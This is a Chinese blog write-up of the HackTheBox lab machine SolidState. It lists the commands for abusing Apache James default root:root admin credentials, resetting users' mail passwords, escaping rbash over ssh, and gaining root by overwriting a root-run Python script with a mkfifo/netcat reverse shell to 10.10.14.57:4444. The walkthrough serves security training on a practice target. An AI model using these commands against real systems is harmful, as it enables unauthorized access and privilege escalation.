hackthebox-solidstate(考点:Apache James安全/受限制的rbash/ linux修改脚本)

最新推荐文章于 2023-04-13 23:56:40 发布
最新推荐文章于 2023-04-13 23:56:40 发布
阅读量360 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105468433
版权
本文详细介绍了在hackthebox固体状态靶机中的渗透过程,包括nmap扫描发现Apache James服务器,利用默认登录信息进行渗透,通过rbash限制shell的绕过方法,以及最终通过修改有写权限的脚本来实现提权至root的步骤。
摘要由CSDN通过智能技术生成

1、nmap扫描

在这里插入图片描述
80看看没啥,dirbuster也没扫出啥有价值的
在这里插入图片描述
在这里插入图片描述
再看nmap的端口扫描结果,出现了James端口,网上搜搜,很快明白了可能存在的漏洞,这篇文章说了默认登录信息是端口4555的root:root,文章下面还写了一些操作命令

2、james渗透

连接它,并列举出用户信息,最后把每个用户的密码都重置为666

telnet 10.10.10.51 4555
listusers
setpassword mindy 666

在这里插入图片描述
然后110端口是他的邮件服务,比如我要以mindy用户登录,再查看他的邮件

telnet 10.10.10.51 110
USER mindy
PASS 666
retr 1
retr 2

在第二封邮件里查到了他的ssh
在这里插入图片描述
ok登录,但是却什么都不能执行。这是个-rbash,受到了限制的shell
在这里插入图片描述

3、rbash绕过

继续搜怎么绕过。这篇有提到怎么绕过

最后我用这个绕过了

ssh mindy@10.10.10.51 "bash --noprofile"

bash-shell就是没字符提示的,很多时候我都没反应过来,以为出问题没成功登录呢

tty:python -c 'import pty; pty.spawn("/bin/bash")'

4、提权

ok老套路linpeas.sh传进去扫

发现有几个文件我们是有写的权限,而在进程扫描中,又发现其中的/opt/tmp.py 恰好root执行的。

在这里插入图片描述
在这里插入图片描述

这里的提权思路就很简单明了。我有写的权限,那我就把这个文件重写,改成弹shell的文件呗。反正你也是root执行,最后被root执行就成了root弹shell给我了。这个套路,广泛存在于linux靶机中。我之前写的hackthebox的linux靶机渗透文章有很多都是这个套路。可以参考

有很多方法,进去改&删了他再重建&echo覆盖,都可以

echo "import os;os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.57 4444 >/tmp/f')" > /opt/tmp.py

本机打开监听,收到root,搞定
在这里插入图片描述

冬萍子
关注
OSCP靶场1-SolidState(smtp、pop3、james
墨痕诉清风的博客
04-22 356
注:如果下载文件,通过 python -m http.server 80,进入 /tmp文件夹下载,否则经常出现没有权限。1. 可以看到这是台32位 debian 操作系统,内核版本 Linux 4.9.0,可以进行查找该内核提权漏洞。根据exp解释,当登录任意用户将执行反弹shell,利用了 /etc/bash_completion.d 机制。成功反弹,且因为payload利用的是sh,已经不受限制rbash了。利用ssh登录,但是被rbash限制,非常多的命令不能使用,退出。
hackthebox - jail (考点linux缓冲区 & nfs配置提权 & rvim提权 & rar解密 & rsa解密)
冬萍子癸水
05-10 819
1 扫描 看到常规的22,可能有ssh登录,80进web搜集信息,还有个nfs ,要想到showmount 以及mount -t nfs 2 http下的linux缓冲区溢出 在http里,dirbuster扫,看到jail这些文件。查看c源码,可以知道端口信息,以及账户名和密码,以及还有debug模式 下载下来,看就像缓冲区溢出。先测试哪里存在缓冲区溢出,command这里正常 C:\root> nc 10.10.10.34 7411 OK Ready. Send USER command.
Hack the box靶机 SolidState
菜浪马废的博客
05-20 345
有可以用的漏洞 但是需要账户 什么也没有 看一下4555的管理服务 goole一下初始密码 root:root 以为可以ssh了 发现只能pop 给了账号连ssh mindy:P@55W0rd1!2@ 天啊,直接ssh可以查看root.txt 看一眼walkthrough 不太对劲啊 我没提权 重置一下机器 rbash绕过 这才对 找了半天也没啥东西 上les.py找一下 蒙蔽了 一大堆信息 看不过来都 一个有root权限的py脚本 删除/tmp文件的脚本 那直接替换 变蓝了是因为刚才.
【Hack The Boxlinux练习-- SolidState
人间体佐菲的博客
11-09 542
【Hack The Boxlinux练习-- SolidState
No.115-HackTheBox-Linux-SolidState-Walkthrough渗透学习
qq_34801745的博客
05-26 321
** HackTheBox-Linux-Miral-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/85 靶机难度:中级(4.5/10) 靶机发布日期:2017年10月18日 靶机描述: SolidState is a medium difficulty machine that requires chaining of multiple attack vectors in order to get a privileg
AdminLTE box结构小结
just4you的博客
10-18 6009
adminlte box小结
hackthebox-brainfuck(考点:dns/wordpress漏洞/smtp/110pop3/密码学)
冬萍子癸水
04-19 2963
nmap C:\root\Desktop> nmap -A 10.10.10.17 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-18 09:13 EDT Nmap scan report for 10.10.10.17 Host is up (0.33s latency). Not shown: 995 filtered ports ...
vulnhub-SolidState: 1靶机渗透测试
m0_68117643的博客
07-05 920
vulnhub-SolidState: 1靶机渗透测试
solidstate-wordpress:固态-WordPress主题
03-15
创建两个空页面,一个命名为Blog(最好将其永久链接更改为Blog),另一个命名为任意名称(例如Home)。 转到设置->阅读,将“您的首页显示”选项更改为“静态页面” 在“主页”中选择“主页”,在“帖子页面”中...
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3160
每台都做一做,然后记录在博客里.供自己和大家一起学习.
HTB-SolidState
TA不懒,但还没有添加简介
04-13 491
HTB-SolidState
CSS——box-shadow做一个border:solid 效果
HarryHY的博客
10-25 1789
由于在查bug的时候发现了使用border会出现样式的小bug ——由于border会占据盒模型的长高 突然想到不如用box-shadow做一个border的样式 CSS:——border border:1px solid #0cbbea; CSS3:——box-shadow box-shadow:0 0 0 1px #0cbbea; 语法如下 box-shadow: h-shadow v-s...
James server 2.3.2远程命令执行漏洞
b10d9的博客
05-07 1531
James server 2.3.2远程命令执行漏洞 Apache James Server 2.3.2 - Remote Command Execution - Linux remote Exploit (exploit-db.com) 漏洞利用条件: JAMES Remote Administration Tool 版本为2.3.2 已知root账号密码(默认账号root:root) 漏洞利用说明: 脚本执行后,当用户登录目标系统,即会触发执行脚本发送的payload,当登录用户为root时,则
hackthebox-bankrobber(考点:xss/xsrf/端口转发/缓冲区溢出)
冬萍子癸水
04-18 738
nmap PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4) | http-methods: |_ Supported Methods: HEAD POST |_http-server-header: Apac...
漏洞payload 靶机_HTB靶机SolidState
weixin_34476847的博客
12-25 312
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.51本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描执行命令autorecon 10.10.10.51 -o ./solidstate-autor...
vpn集中配置方法.docx
09-17
cisco设备配置指导
吉他谱_What's My Age Again - Blink-182.pdf
09-17
初级入门吉他谱 guitar tab
c1900-universalk9-npe-mz.SPA.151-2.T0a.bin
最新发布
09-17
c1900-universalk9-npe-mz.SPA.151-2.T0a.bin
20comm-um002:通讯卡设置与D网配置指南
文档强调了对于固态控制设备的安全使用,指出用户应遵循Solidstate Controls应用、安装和维护的Safety Guidelines (SGI-1.1),这份指南可以从当地的Rockwell Automation销售办公室获取,或者在线访问官方网站获取更...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值